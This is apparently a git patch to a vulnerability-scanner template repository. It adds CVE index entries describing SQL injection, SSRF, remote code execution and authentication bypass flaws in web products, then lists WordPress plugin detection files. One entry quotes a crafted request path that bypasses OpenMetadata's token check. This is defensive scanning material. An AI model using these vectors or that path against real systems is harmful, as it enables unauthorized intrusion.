{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} {"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} @@ -2373,7 +2378,7 @@ {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} {"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} -{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} +{"ID":"CVE-2024-1561","Info":{"Name":"Gradio 4.3-4.12 - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-1728","Info":{"Name":"Gradio \u003e 4.19.1 UploadButton - Path Traversal","Severity":"high","Description":"gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1728.yaml"} @@ -2404,6 +2409,7 @@ {"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} +{"ID":"CVE-2024-27718","Info":{"Name":"Smart s200 Management Platform v.S200 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27718.yaml"} {"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} {"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"} {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} @@ -2421,17 +2427,20 @@ {"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} {"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"} {"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"} +{"ID":"CVE-2024-31982","Info":{"Name":"XWiki \u003c 4.10.20 - Remote code execution","Severity":"critical","Description":"XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31982.yaml"} {"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 17c52f1d63..ec20a23695 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -5bf79d4f9b6c31dc26f1ae2f9acb7675 +0179f5035edf290e319fa948308df7ad From 1cb9f9d41bc6ab1f5d6ff73e59a4a0823b3e8e6a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 00:19:11 +0000 Subject: [PATCH 0391/1841] Auto WordPress Plugins Update [Wed Jun 19 00:19:11 UTC 2024] :robot: --- helpers/wordpress/plugins/ad-inserter.txt | 2 +- .../wordpress/plugins/admin-menu-editor.txt | 2 +- .../plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/akismet.txt | 2 +- .../wordpress/plugins/all-in-one-seo-pack.txt | 2 +- .../plugins/all-in-one-wp-migration.txt | 2 +- .../all-in-one-wp-security-and-firewall.txt | 2 +- helpers/wordpress/plugins/amp.txt | 2 +- helpers/wordpress/plugins/antispam-bee.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/autoptimize.txt | 2 +- helpers/wordpress/plugins/backwpup.txt | 2 +- .../wordpress/plugins/better-wp-security.txt | 2 +- .../wordpress/plugins/breadcrumb-navxt.txt | 2 +- helpers/wordpress/plugins/breeze.txt | 2 +- .../wordpress/plugins/broken-link-checker.txt | 2 +- .../plugins/child-theme-configurator.txt | 2 +- .../plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/cmb2.txt | 2 +- helpers/wordpress/plugins/coblocks.txt | 2 +- helpers/wordpress/plugins/code-snippets.txt | 2 +- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/contact-form-7.txt | 2 +- .../wordpress/plugins/contact-form-cfdb7.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/cookie-notice.txt | 2 +- .../creative-mail-by-constant-contact.txt | 2 +- helpers/wordpress/plugins/custom-css-js.txt | 2 +- helpers/wordpress/plugins/custom-fonts.txt | 2 +- .../wordpress/plugins/custom-post-type-ui.txt | 2 +- .../wordpress/plugins/disable-comments.txt | 2 +- .../wordpress/plugins/disable-gutenberg.txt | 2 +- helpers/wordpress/plugins/duplicator.txt | 2 +- .../duracelltomi-google-tag-manager.txt | 2 +- helpers/wordpress/plugins/easy-wp-smtp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- .../wordpress/plugins/elementskit-lite.txt | 2 +- .../plugins/enable-media-replace.txt | 2 +- helpers/wordpress/plugins/envato-elements.txt | 2 +- .../essential-addons-for-elementor-lite.txt | 2 +- .../plugins/ewww-image-optimizer.txt | 2 +- .../plugins/facebook-for-woocommerce.txt | 2 +- .../wordpress/plugins/fast-indexing-api.txt | 2 +- helpers/wordpress/plugins/flamingo.txt | 2 +- helpers/wordpress/plugins/fluentform.txt | 2 +- helpers/wordpress/plugins/font-awesome.txt | 2 +- .../plugins/force-regenerate-thumbnails.txt | 2 +- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- .../wordpress/plugins/ga-google-analytics.txt | 2 +- .../plugins/gdpr-cookie-compliance.txt | 2 +- .../google-analytics-dashboard-for-wp.txt | 2 +- .../google-analytics-for-wordpress.txt | 2 +- .../plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- .../plugins/google-sitemap-generator.txt | 2 +- helpers/wordpress/plugins/gtranslate.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- .../plugins/happy-elementor-addons.txt | 2 +- .../plugins/header-footer-code-manager.txt | 2 +- .../plugins/header-footer-elementor.txt | 2 +- helpers/wordpress/plugins/header-footer.txt | 2 +- .../wordpress/plugins/host-webfonts-local.txt | 2 +- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/imagify.txt | 2 +- helpers/wordpress/plugins/imsanity.txt | 2 +- .../plugins/insert-headers-and-footers.txt | 2 +- .../plugins/intuitive-custom-post-order.txt | 2 +- helpers/wordpress/plugins/iwp-client.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/kirki.txt | 2 +- helpers/wordpress/plugins/leadin.txt | 2 +- .../plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/litespeed-cache.txt | 2 +- helpers/wordpress/plugins/loco-translate.txt | 2 +- helpers/wordpress/plugins/loginizer.txt | 2 +- .../wordpress/plugins/mailchimp-for-wp.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/maintenance.txt | 2 +- helpers/wordpress/plugins/mainwp-child.txt | 2 +- .../wordpress/plugins/malcare-security.txt | 2 +- helpers/wordpress/plugins/megamenu.txt | 2 +- helpers/wordpress/plugins/members.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/metform.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- .../plugins/nextend-facebook-connect.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- .../plugins/official-facebook-pixel.txt | 2 +- .../plugins/one-click-demo-import.txt | 2 +- helpers/wordpress/plugins/optinmonster.txt | 2 +- .../wordpress/plugins/password-protected.txt | 2 +- helpers/wordpress/plugins/pdf-embedder.txt | 2 +- .../plugins/pinterest-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/polylang.txt | 2 +- helpers/wordpress/plugins/popup-maker.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- .../wordpress/plugins/post-types-order.txt | 2 +- .../plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/pretty-link.txt | 2 +- .../plugins/really-simple-captcha.txt | 2 +- .../wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/redirection.txt | 2 +- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/safe-svg.txt | 2 +- .../wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/sg-security.txt | 2 +- .../wordpress/plugins/shortcodes-ultimate.txt | 2 +- .../plugins/shortpixel-image-optimiser.txt | 2 +- helpers/wordpress/plugins/siteguard.txt | 2 +- .../wordpress/plugins/siteorigin-panels.txt | 2 +- helpers/wordpress/plugins/smart-slider-3.txt | 2 +- .../wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/sucuri-scanner.txt | 2 +- .../plugins/table-of-contents-plus.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- .../plugins/taxonomy-terms-order.txt | 2 +- .../wordpress/plugins/the-events-calendar.txt | 2 +- .../plugins/translatepress-multilingual.txt | 2 +- .../plugins/ultimate-addons-for-gutenberg.txt | 2 +- .../plugins/under-construction-page.txt | 2 +- helpers/wordpress/plugins/updraftplus.txt | 2 +- .../wordpress/plugins/user-role-editor.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- .../plugins/webp-converter-for-media.txt | 2 +- .../plugins/woo-cart-abandonment-recovery.txt | 2 +- .../plugins/woo-checkout-field-editor-pro.txt | 2 +- .../plugins/woocommerce-gateway-stripe.txt | 2 +- .../plugins/woocommerce-payments.txt | 2 +- .../plugins/woocommerce-paypal-payments.txt | 2 +- ...woocommerce-pdf-invoices-packing-slips.txt | 2 +- .../plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wordfence.txt | 2 +- .../wordpress/plugins/wordpress-importer.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- .../wordpress/plugins/wp-fastest-cache.txt | 2 +- helpers/wordpress/plugins/wp-file-manager.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- helpers/wordpress/plugins/wp-mail-smtp.txt | 2 +- .../wordpress/plugins/wp-maintenance-mode.txt | 2 +- helpers/wordpress/plugins/wp-migrate-db.txt | 2 +- helpers/wordpress/plugins/wp-optimize.txt | 2 +- helpers/wordpress/plugins/wp-reset.txt | 2 +- .../plugins/wp-reviews-plugin-for-google.txt | 2 +- helpers/wordpress/plugins/wp-rollback.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- helpers/wordpress/plugins/wp-sitemap-page.txt | 2 +- helpers/wordpress/plugins/wp-smushit.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-super-cache.txt | 2 +- helpers/wordpress/plugins/wpcf7-recaptcha.txt | 2 +- helpers/wordpress/plugins/wpcf7-redirect.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- helpers/wordpress/plugins/wps-hide-login.txt | 2 +- .../plugins/wpvivid-backuprestore.txt | 2 +- .../plugins/yith-woocommerce-wishlist.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 3 +- .../wordpress/plugins/add-to-any.yaml | 3 +- .../wordpress/plugins/admin-menu-editor.yaml | 3 +- .../plugins/advanced-custom-fields.yaml | 3 +- .../wordpress/plugins/akismet.yaml | 3 +- .../plugins/all-in-one-seo-pack.yaml | 5 +- .../plugins/all-in-one-wp-migration.yaml | 5 +- .../all-in-one-wp-security-and-firewall.yaml | 3 +- http/technologies/wordpress/plugins/amp.yaml | 3 +- .../wordpress/plugins/antispam-bee.yaml | 3 +- .../wordpress/plugins/astra-sites.yaml | 3 +- .../wordpress/plugins/autoptimize.yaml | 3 +- .../wordpress/plugins/backwpup.yaml | 5 +- .../plugins/better-search-replace.yaml | 3 +- .../wordpress/plugins/better-wp-security.yaml | 3 +- .../plugins/black-studio-tinymce-widget.yaml | 3 +- .../wordpress/plugins/breadcrumb-navxt.yaml | 3 +- .../wordpress/plugins/breeze.yaml | 3 +- .../plugins/broken-link-checker.yaml | 5 +- .../plugins/child-theme-configurator.yaml | 3 +- .../wordpress/plugins/classic-editor.yaml | 3 +- .../wordpress/plugins/classic-widgets.yaml | 3 +- .../plugins/click-to-chat-for-whatsapp.yaml | 3 +- http/technologies/wordpress/plugins/cmb2.yaml | 3 +- .../wordpress/plugins/coblocks.yaml | 3 +- .../wordpress/plugins/code-snippets.yaml | 3 +- .../wordpress/plugins/coming-soon.yaml | 3 +- .../wordpress/plugins/complianz-gdpr.yaml | 3 +- .../plugins/contact-form-7-honeypot.yaml | 3 +- .../wordpress/plugins/contact-form-7.yaml | 3 +- .../wordpress/plugins/contact-form-cfdb7.yaml | 3 +- .../wordpress/plugins/cookie-law-info.yaml | 5 +- .../wordpress/plugins/cookie-notice.yaml | 3 +- .../wordpress/plugins/copy-delete-posts.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/creame-whatsapp-me.yaml | 5 +- .../creative-mail-by-constant-contact.yaml | 3 +- .../wordpress/plugins/custom-css-js.yaml | 3 +- .../wordpress/plugins/custom-fonts.yaml | 3 +- .../plugins/custom-post-type-ui.yaml | 3 +- .../wordpress/plugins/disable-comments.yaml | 3 +- .../wordpress/plugins/disable-gutenberg.yaml | 3 +- .../wordpress/plugins/duplicate-page.yaml | 3 +- .../wordpress/plugins/duplicate-post.yaml | 3 +- .../wordpress/plugins/duplicator.yaml | 5 +- .../duracelltomi-google-tag-manager.yaml | 5 +- .../plugins/easy-table-of-contents.yaml | 3 +- .../wordpress/plugins/easy-wp-smtp.yaml | 3 +- .../wordpress/plugins/elementor.yaml | 3 +- .../wordpress/plugins/elementskit-lite.yaml | 3 +- .../plugins/enable-media-replace.yaml | 3 +- .../wordpress/plugins/envato-elements.yaml | 3 +- .../essential-addons-for-elementor-lite.yaml | 5 +- .../plugins/ewww-image-optimizer.yaml | 3 +- .../plugins/facebook-for-woocommerce.yaml | 5 +- .../wordpress/plugins/fast-indexing-api.yaml | 3 +- .../favicon-by-realfavicongenerator.yaml | 3 +- .../wordpress/plugins/flamingo.yaml | 3 +- .../wordpress/plugins/fluentform.yaml | 5 +- .../wordpress/plugins/font-awesome.yaml | 3 +- .../plugins/force-regenerate-thumbnails.yaml | 3 +- .../wordpress/plugins/formidable.yaml | 5 +- .../wordpress/plugins/forminator.yaml | 3 +- .../plugins/ga-google-analytics.yaml | 3 +- .../plugins/gdpr-cookie-compliance.yaml | 5 +- .../google-analytics-dashboard-for-wp.yaml | 3 +- .../google-analytics-for-wordpress.yaml | 3 +- .../plugins/google-listings-and-ads.yaml | 3 +- .../wordpress/plugins/google-site-kit.yaml | 3 +- .../plugins/google-sitemap-generator.yaml | 3 +- .../wordpress/plugins/gtranslate.yaml | 3 +- .../wordpress/plugins/gutenberg.yaml | 3 +- .../plugins/happy-elementor-addons.yaml | 3 +- .../plugins/header-footer-code-manager.yaml | 3 +- .../plugins/header-footer-elementor.yaml | 3 +- .../wordpress/plugins/header-footer.yaml | 3 +- .../wordpress/plugins/health-check.yaml | 3 +- .../wordpress/plugins/hello-dolly.yaml | 